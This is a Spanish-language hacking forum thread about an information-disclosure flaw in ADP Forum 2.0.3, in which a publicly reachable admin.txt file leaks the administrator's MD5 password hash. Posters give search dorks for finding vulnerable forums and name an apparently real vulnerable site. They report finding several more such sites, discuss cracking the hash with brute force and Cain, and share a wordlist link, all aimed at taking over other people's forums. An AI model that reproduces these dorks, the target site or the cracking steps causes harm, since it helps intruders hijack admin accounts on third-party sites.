ADP Forum 2.0.3 is powered by VzScripts ---- vulneravilidad que nos da el MD5

Started by KM, December 31, 2006, 09:45:52 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

KM

December 31, 2006, 09:45:52 AM
En realidad no existe algo mas facil  que esto.

Esto es lo que nos dara un foro vulnerable al ejecutar de la siguiente manera este codigo.En foros Dork:ADP Forum 2.0.3 is powered by VzScripts

http:/[target]/[path]/users/admin.txt

Quoteadmin
Master Member
115
images/avatars/1120150756.gif
http://www..com
9368439
30-06-2005
Admin
6c41745bbdf353a134a3d8207eb82ea4
1120150756

kobe

#1
December 31, 2006, 03:25:30 PM
 ;D

Pobres de los que usen ese foro, esta muy inocente el error

ElecBoy

#2
December 31, 2006, 11:43:13 PM
Ala verdad que el que hizo ese Script es bien inteligente!
-[ElecBoy]
HackPR.NET


"Tell me and I forget.  Teach me and I remember.  Involve me and I learn."        
                                     — Benjamin Franklin

freshjive

#3
January 01, 2007, 04:44:58 AM
recomendado para los que despues no saben que hacer cuando los amenazan los administradores
Quote from: Ҝ٥m‬┬≡ζ1 on December 31, 2006, 10:52:14 PM
avisar a los admin...
Komtec1

kazin

#4
January 02, 2007, 06:11:53 PM
Quote from: ElecBoy on December 31, 2006, 11:43:13 PM
Ala verdad que el que hizo ese Script es bien inteligente!

Inteligente? :P

Creo que esto ya supero todas mis espectativas de lo que es FACIL :P

Ya es demasiado... increible que aun exista gente con sistemas tan vulnerables

cMr_Newbie

#5
January 03, 2007, 12:02:28 AM
Quotehttp:/[target]/[path]/users/admin.txt

Oye bro, no entiendo que es lo que tiene que ir en eso de target  ni el path, que es lo que se debe de poner ahí o que,, dame un ejemplo para darme una idea bro , si me pudieras hacer el favor bro  ;)

Quoteadmin
Master Member
115
images/avatars/1120150756.gif
http://www..com
9368439
30-06-2005
Admin
6c41745bbdf353a134a3d8207eb82ea4
1120150756

Y de esto que pusiste explicame un poco mas para entender mas bien de esta vulnerabilidad bro.

KM

#6
January 03, 2007, 07:45:43 AM
Deverias aprender cositas basicas men, como lo  que significa un target. Pero como yo tampoco lo sabiar y me lo digeron pues aqui tienes con un site vul..

target= direccion url de la web.
path= modulo    /foro/    o   /buscador/  etc.....

http:/[target]/[path]/users/admin.txt

http://pagina/modulovulnerqble//users/admin.txt



http://www.mejorambiente.com.mx/foro/

cMr_Newbie

#7
January 04, 2007, 04:37:34 PM
 :D jejej, gracias bro, la verdad y si tienes razón pero ese día ya después me explicó Komtec1, e incluso ví que también se les puede hacer algo a los foros que nada mas tengas powered by VzScrtip sin necesidad de que sean de ADP  ;D , ya que yo lo hice en uno de VzScript sin ADP y no se veía ningún post  ;D ... muchas gracias por tu ayuda bro .......

.y Gracias Komtec1...

kazin

#9
January 08, 2007, 01:28:33 AM
Estube investigando un poco... aparentemente todos los d0rks son estos:

Code Select
"ADP Forum 2.0.3 is powered by VzScripts"
"ADP Forum 2.0.2"
"ADP Forum 2.0.1"
"ADP Forum 2.0"

the_hacker_666

#10
January 09, 2007, 02:19:23 PM
y ese hash en que esta encriptado? md5? :S no pude crackearlo en milw0rm (ninguno de las 6 o 7 webs vulnerables que encontre...)

kazin

#11
January 09, 2007, 03:53:48 PM
Por ahi no lo encuentra milw0rm... porque no provas con un crack manual? a brute force puede funcionar

the_hacker_666

#12
January 10, 2007, 01:00:24 PM
probe con el cain... y tampoco lo saco... tarde dos dias xD (no queria consumir mucha memoria).

KM

#13
January 12, 2007, 02:53:00 AM
A BrutoForce para mi que es algo mmmm impaciente, usate estos wordlist, talvez te funcione..

ftp://ftp.ox.ac.uk/pub/wordlists/
Print
Go Up Pages1
User actions